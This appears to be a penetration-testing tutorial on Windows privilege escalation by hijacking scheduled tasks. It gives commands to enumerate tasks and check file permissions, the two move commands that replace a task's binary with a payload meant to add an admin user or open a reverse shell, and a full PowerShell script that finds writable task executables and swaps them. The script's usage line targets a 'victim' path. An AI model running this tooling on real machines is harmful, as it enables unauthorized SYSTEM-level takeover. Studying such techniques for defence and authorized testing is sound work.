In order to leverage this approach to privilege escalation, we need to know which scheduled tasks exist, when each one is next due to run, and which account it runs as. We also need to know whether we can write to the file the task executes, because that is the opportunity: we swap in a binary that adds an administrative user or spawns a reverse shell, then wait for the task to fire under the privileged account.
Get-ScheduledTask
# uses PowerShell to get scheduled tasks (ScheduledTasks module, Windows 8 / Server 2012 and later); pipe a task into Get-ScheduledTaskInfo to see its next run time.
schtasks /query /fo LIST /v
# lists every scheduled task in verbose form, including "Run As User", "Next Run Time" and "Task To Run"; the list can be enormous, so it might take a while to pick through. As a low-privilege user you only see the tasks you have read access to.
icacls filename
# we want F (full control), M (modify) or W (write) on the file, granted to our user or one of our groups; any of those lets us overwrite it. If the task runs as SYSTEM or an administrator and we can overwrite its binary, our code runs with that account's privileges the next time the task fires.
Once we have confirmed that the task runs as SYSTEM (or another privileged account) and that we can write to the file it executes, we replace that file.
This is as simple as:
move .\Documents\OriginalFile.exe binary.exe
move .\exploit.exe .\Documents\OriginalFile.exe
It's important to remember that the scheduled task references the original file by its path and name, so the payload has to take over that exact name. Dropping exploit.exe into the same directory under its own name achieves nothing: the task would still run whatever sits at the 'OriginalFile.exe' path, or fail to find the file at all if we had moved the original away. Keep in mind that the original program no longer runs after the swap, so whatever job the task normally did stops happening, and the payload runs non-interactively as the task's account with no desktop session.
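The whole procedure in one script, as an added example that is not part of the original page: it enumerates enabled tasks, pulls each task's principal and next run time, resolves the executable in the task action, and checks the file's ACL for W, M or F granted to the current user or one of their groups (the same check icacls lets you do by eye). The function names Test-FileWritable, Find-HijackableTasks and Swap-TaskBinary are my own, and the script assumes Windows 8 / Server 2012 or later (the ScheduledTasks module) and that the task action is a direct path to an executable.

```powershell
# Added example (not from the original page). Assumes the ScheduledTasks module
# (Windows 8 / Server 2012+). Function names are this example's own.

# SIDs of the current user and every group they belong to; ACEs are matched on these.
$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids   = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

function Test-FileWritable {
    # Approximates icacls: true if an Allow ACE for us carries W, M or F and no
    # matching Deny ACE does. Rights are compared as integers because generic
    # rights (e.g. GENERIC_ALL) are not named members of the enum.
    param([Parameter(Mandatory)][string]$Path)
    $R    = [System.Security.AccessControl.FileSystemRights]
    $want = [int]($R::Write -bor $R::Modify -bor $R::FullControl)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $allowed = $false
    foreach ($ace in $acl.Access) {
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }                                   # orphaned / unresolvable SID
        if ($mySids -notcontains $sid) { continue }            # ACE is not about us
        if ((([int]$ace.FileSystemRights) -band $want) -eq 0) { continue }
        if ($ace.AccessControlType -eq 'Deny') { return $false } # an explicit deny wins
        $allowed = $true
    }
    return $allowed
}

function Find-HijackableTasks {
    # Enabled tasks whose action points at a file we can overwrite, with the
    # account they run as and when they next fire.
    Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        $info = $task | Get-ScheduledTaskInfo -ErrorAction SilentlyContinue
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }             # COM-handler actions have no Execute
            $exe = [Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"')
            # Bare names such as cmd.exe resolve via PATH at run time; they are skipped here.
            if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
            if (Test-FileWritable -Path $exe) {
                [pscustomobject]@{
                    Task      = $task.TaskPath + $task.TaskName
                    RunsAs    = $task.Principal.UserId
                    RunLevel  = $task.Principal.RunLevel
                    NextRun   = $info.NextRunTime
                    Binary    = $exe
                    Arguments = $action.Arguments
                }
            }
        }
    }
}

function Swap-TaskBinary {
    # Same idea as the two 'move' commands above: park the original under a
    # different name, then put the payload in place under the ORIGINAL name,
    # because that is the path the task action references.
    param(
        [Parameter(Mandatory)][string]$Target,   # binary the task runs, e.g. C:\...\OriginalFile.exe
        [Parameter(Mandatory)][string]$Payload   # our exploit.exe
    )
    Move-Item -LiteralPath $Target -Destination "$Target.bak" -Force
    Copy-Item -LiteralPath $Payload -Destination $Target
}

# Usage: list candidates, then swap the one that runs as SYSTEM.
Find-HijackableTasks | Format-Table -AutoSize
# Swap-TaskBinary -Target 'C:\Users\victim\Documents\OriginalFile.exe' -Payload '.\exploit.exe'
```

Two limits worth knowing: Get-ScheduledTask only returns tasks the current user can read, so a sparse result does not mean there is nothing to find, and the check only looks at the executable in the action. When the action is an interpreter (powershell.exe -File something.ps1, cmd /c something.bat), the file you actually want to test with icacls is the script named in Arguments, not the interpreter.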